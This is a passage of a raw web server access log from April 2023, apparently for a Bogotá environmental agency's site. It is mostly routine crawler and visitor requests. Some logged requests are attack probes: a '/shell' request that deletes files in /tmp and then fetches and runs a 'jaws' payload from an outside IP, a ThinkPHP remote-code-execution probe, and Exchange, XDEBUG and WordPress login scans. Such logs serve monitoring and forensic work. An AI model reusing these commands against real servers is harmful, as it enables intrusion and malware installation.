2UeP3Gwx+d4jE48WSuUtqyjw+3ocqd1SZxwZfu7FpKF9wMFjD09i9s6GdCm3IDG1ihDwb+dyGlnpxBfCUiOj4+hj3cZ3OolnY8s/ywrTwmew20VzqGci719zfSWdagI46HymlVYpmjNjnkTVE88g48Nngivv244eQtivtrpM/prrOLyd6wtdMGd0nlhNe8R1Vza1pEpLIrzgrFdHM1PJaYjBORuvaTYDyhzH0VO75oj7L/Awho4UcolF748HiCjDik/FVvjaeUZTUJJVifxZRO9GXSjGApVMqIwstKyWAwhwgI9jJaCHm3Zq/FmSgPHabPW11xgR9uuzXVZXk0wfH+AmY5ohU4PVnIuxV8Z8oMp/pt5qFAPDkZUJsf6dIq/m8q5TdhwyWMdIxsVMxzrGJ3fV8YKwZ3iJ4KYMRRiVduT+ffYJZQ1rV/5YZZvsnEMbds06A8ZMhWePh3Fo0JssKHCJH6N0DqX6XgtBTPDDJpiMZhHBVEu+X1YYOvLnoT6HesjzCAnSYtQr8/OmQ+V3sBiDT8kiRjhJjl7VjWgopVgZOOS7L4CY9Of434ugixQxI9KfpZI8D4U/wixNPpTV6MNowh9keapCDdd90Br40MqLgNcMsfXZ/2D1DCVkLwDqDeayBtbUEFm4iOLuXgkXWb3XA1IKmO5Mq4RWs1vaJijsELzCm++ehkSmzg2Ox0zHAkbeqqjXiMe7flKsnGtSJywQSR0j8rKxN/8jjOsgGCvZjHQ827HGO4aH3EahgqvvogjbYi00P/SiY46A7OYmLP/E1Knz2in+oiJRMUNLw+nFAJfOMgcHteluxOObyrNbCdc6enDtvxSQB51bmGfFyACNGJResd/xLVAszO+d/vS6NB5hjvFHOMjoL9nF60uoD2CNVpuFyfFoTboIUaOp3J0yaM2j2rPb6oppr2schcE9GUOpZyZe4+exV0i8VOuuRigd+e2fTel2alnaWqGQf1xLeDU5leHfH5pRPvVM8p3hVfpMaWakHybi/PK5pg7fNpfZdIAGQcgKHTB1Tu3TWgtRwfn1b3ieHZcW/WFN8TQTZCiF0OUlKXoxP0vwp8jJbTlaiSQsSwAdhJzfcbJmwgQAsQI77TI=&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
186.31.57.93 - - [12/Apr/2023:01:19:58 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+xQW2VWZdA44u5Au780wQLjPvUg0JCBu7opkx3j0v4/pv30hVe2m3xkAitYKj2B/X4JsULm9fKSBiLrYZT/kvuVVC03nOzNCuh6JnxaHi1oDIUjvhvUU7/NCjSABQo5TRX6ryyu6yz8AYCRfsBNFw/Mq4STMwZpuc=&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
186.31.57.93 - - [12/Apr/2023:01:19:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/qleJoi8RrUMAef7Dw6Opm4lBaTVBNqSDwFgHNidjy+XOgx953nLBwFPvYIHraDLml4mnA1A2Pb1/Sh0pmzqiJ/VrKDn2GrtQ03Bj5CEqVKYdCvrXRkmaJUpuCDRD1pa6Ra/hZBybFRidpArGENff8+va8n814PSI=&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
186.31.57.93 - - [12/Apr/2023:01:20:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+7pLA0i4vyRNnYKrD9zTw4tk25Fc8JQXNjqC3WLyBVYEZRm7XUiqX6y//ISwjC5Jmm1XkoHfAsXvu9fOzLRtGKkGsHHhReu42CvH3p+qTiMbFHwrmQaSW8iIqm/d5WgJcyBvOQFsKD2uSqrec2b/QQW6iByFK52Wk=&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
186.31.57.93 - - [12/Apr/2023:01:20:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/VTKB4i4A8LCQVGT8q4klYZpaqZJJWaAqlAbjbs948bl/d393FTqP/r9ysrm/oeRbuQe5a3ObLJOSWLUdXI1aeVRO/LIYFkf2nvWa9FEq5jFYTanPKrylD1dTl3ijpg6hXUGlmHrn8Mkw3HIjRk3Lg0tp/5jZSeWSWNfsrp5bG++tRG2YP9l5LFuVBaa5Z75Gk4cfcI8I9RA==&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
216.245.221.92 - - [12/Apr/2023:01:20:17 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.172 - - [12/Apr/2023:01:21:39 -0500] "-" 408 -
52.167.144.30 - - [12/Apr/2023:01:21:47 -0500] "GET /forest/ HTTP/1.1" 200 12041
152.61.128.50 - - [12/Apr/2023:01:22:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [12/Apr/2023:01:22:37 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [12/Apr/2023:01:22:37 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [12/Apr/2023:01:21:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:01:23:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:22:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [12/Apr/2023:01:25:17 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.207 - - [12/Apr/2023:01:26:13 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
157.55.39.207 - - [12/Apr/2023:01:26:13 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
52.167.144.58 - - [12/Apr/2023:01:26:15 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
157.55.39.219 - - [12/Apr/2023:01:26:17 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
172.22.2.4 - - [12/Apr/2023:01:27:29 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
201.245.192.253 - - [12/Apr/2023:01:28:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:27:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:01:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42343
201.245.192.253 - - [12/Apr/2023:01:29:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
35.204.85.204 - - [12/Apr/2023:01:29:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [12/Apr/2023:01:28:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
216.245.221.92 - - [12/Apr/2023:01:30:17 -0500] "HEAD / HTTP/1.1" 200 -
114.35.88.158 - - [12/Apr/2023:01:30:53 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 193.42.32.175/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.70.207 - - [12/Apr/2023:01:32:48 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:01:33:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:33:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:01:35:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:34:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
157.55.39.207 - - [12/Apr/2023:01:36:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0540.pdf HTTP/1.1" 304 -
66.249.70.168 - - [12/Apr/2023:01:38:12 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:01:38:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:38:44 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [12/Apr/2023:01:38:45 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 200 1636862
201.245.192.253 - - [12/Apr/2023:01:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42343
201.245.192.253 - - [12/Apr/2023:01:39:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
216.245.221.92 - - [12/Apr/2023:01:40:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:39:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:39:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.190.97 - - [12/Apr/2023:01:42:09 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [12/Apr/2023:01:43:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Apr/2023:01:45:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:45:01 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 36811
172.22.2.4 - - [12/Apr/2023:01:44:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.168 - - [12/Apr/2023:01:46:38 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:01:45:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
201.245.192.253 - - [12/Apr/2023:01:48:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Apr/2023:01:50:17 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.94 - - [12/Apr/2023:01:51:56 -0500] "GET /BLA/resoluciones/AUTOS%202013/0076.pdf HTTP/1.1" 304 -
172.22.2.4 - - [12/Apr/2023:01:50:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.220.149.15 - - [12/Apr/2023:01:53:13 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 206 943
66.220.149.3 - - [12/Apr/2023:01:53:15 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 200 943
201.245.192.253 - - [12/Apr/2023:01:53:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:51:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
216.245.221.92 - - [12/Apr/2023:01:55:17 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.181 - - [12/Apr/2023:01:55:31 -0500] "GET /images/Secretarias%20Fondo%20carga%206%20de%20febrero.jpeg HTTP/1.1" 200 55460
201.245.192.253 - - [12/Apr/2023:01:58:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:56:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.207 - - [12/Apr/2023:01:58:22 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:01:58:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [12/Apr/2023:01:57:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
216.245.221.92 - - [12/Apr/2023:02:00:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:02:03:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
31.13.103.3 - - [12/Apr/2023:02:03:14 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
172.22.2.4 - - [12/Apr/2023:02:02:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:03:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [12/Apr/2023:02:05:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:02:08:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.207 - - [12/Apr/2023:02:08:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0337.pdf HTTP/1.1" 304 -
172.22.2.4 - - [12/Apr/2023:02:08:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:02:10:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:09:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [12/Apr/2023:02:12:34 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
201.245.192.253 - - [12/Apr/2023:02:13:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
34.91.30.43 - - [12/Apr/2023:02:13:32 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [12/Apr/2023:02:15:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:14:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.58 - - [12/Apr/2023:02:16:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0800.pdf HTTP/1.1" 200 617402
46.248.173.39 - - [12/Apr/2023:02:16:36 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:02:14:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [12/Apr/2023:02:18:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.219 - - [12/Apr/2023:02:18:29 -0500] "GET / HTTP/1.1" 200 319
52.167.144.30 - - [12/Apr/2023:02:18:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0287.pdf HTTP/1.1" 304 -
66.249.70.168 - - [12/Apr/2023:02:19:36 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:02:19:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42372
201.245.192.253 - - [12/Apr/2023:02:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43174
216.245.221.92 - - [12/Apr/2023:02:20:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:19:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:20:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [12/Apr/2023:02:23:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
14.22.11.164 - - [12/Apr/2023:02:23:32 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/mapa-humedales-de-bogot%C3%A1-1.jpg HTTP/1.1" 200 1170768
216.245.221.92 - - [12/Apr/2023:02:25:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:25:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.30 - - [12/Apr/2023:02:27:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/1519.pdf HTTP/1.1" 200 677747
179.43.177.242 - - [12/Apr/2023:02:27:53 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [12/Apr/2023:02:28:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:02:26:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [12/Apr/2023:02:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42372
201.245.192.253 - - [12/Apr/2023:02:29:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43174
185.119.81.104 - - [12/Apr/2023:00:50:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 502 1191
216.245.221.92 - - [12/Apr/2023:02:30:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:02:33:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:02:31:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:32:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
216.245.221.92 - - [12/Apr/2023:02:35:17 -0500] "HEAD / HTTP/1.1" 200 -
17.22.253.246 - - [12/Apr/2023:02:37:13 -0500] "-" 408 -
157.55.39.207 - - [12/Apr/2023:02:37:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0179.pdf HTTP/1.1" 200 2812616
157.55.39.207 - - [12/Apr/2023:02:37:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/2088.pdf HTTP/1.1" 304 -
201.245.192.253 - - [12/Apr/2023:02:38:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:02:38:19 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
172.22.2.4 - - [12/Apr/2023:02:38:35 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
172.22.2.4 - - [12/Apr/2023:02:37:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:39:33 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [12/Apr/2023:02:39:33 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 304 -
201.245.192.253 - - [12/Apr/2023:02:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42372
201.245.192.253 - - [12/Apr/2023:02:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43174
172.22.2.4 - - [12/Apr/2023:02:38:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
216.245.221.92 - - [12/Apr/2023:02:40:17 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.37 - - [12/Apr/2023:02:40:18 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
52.167.144.63 - - [12/Apr/2023:02:40:34 -0500] "GET /sendero/? HTTP/1.1" 200 36439
66.249.70.213 - - [12/Apr/2023:02:41:06 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:02:43:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
51.158.37.186 - - [12/Apr/2023:02:44:46 -0500] "GET / HTTP/1.1" 200 319
51.158.37.186 - - [12/Apr/2023:02:44:46 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [12/Apr/2023:02:43:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:02:45:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:44:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
172.22.2.4 - - [12/Apr/2023:02:48:04 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [12/Apr/2023:02:48:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:02:48:36 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 591315
172.22.2.4 - - [12/Apr/2023:02:49:23 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
66.249.70.170 - - [12/Apr/2023:02:49:36 -0500] "-" 408 -
216.245.221.92 - - [12/Apr/2023:02:50:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:49:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:49:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
172.22.2.4 - - [12/Apr/2023:02:51:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [12/Apr/2023:02:53:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.94 - - [12/Apr/2023:02:54:13 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [12/Apr/2023:02:55:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:54:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:02:55:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
199.16.157.180 - - [12/Apr/2023:02:57:46 -0500] "GET /images/Secretarias%20Fondo%20carga%206%20de%20febrero.jpeg HTTP/1.1" 200 55460
201.245.192.253 - - [12/Apr/2023:02:58:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:02:59:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [12/Apr/2023:03:00:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:00:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [12/Apr/2023:03:02:56 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [12/Apr/2023:03:02:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
201.245.192.253 - - [12/Apr/2023:03:02:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.60 - - [12/Apr/2023:03:03:06 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
172.22.2.4 - - [12/Apr/2023:03:01:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
172.22.2.4 - - [12/Apr/2023:03:03:49 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
40.77.167.94 - - [12/Apr/2023:03:05:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/2136.pdf HTTP/1.1" 304 -
199.16.157.181 - - [12/Apr/2023:03:05:10 -0500] "GET /images/Incendio%20(1)%20(1).png HTTP/1.1" 200 189748
216.245.221.92 - - [12/Apr/2023:03:05:17 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.58 - - [12/Apr/2023:03:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/0809.pdf HTTP/1.1" 200 1776415
201.245.192.253 - - [12/Apr/2023:03:07:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:03:06:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
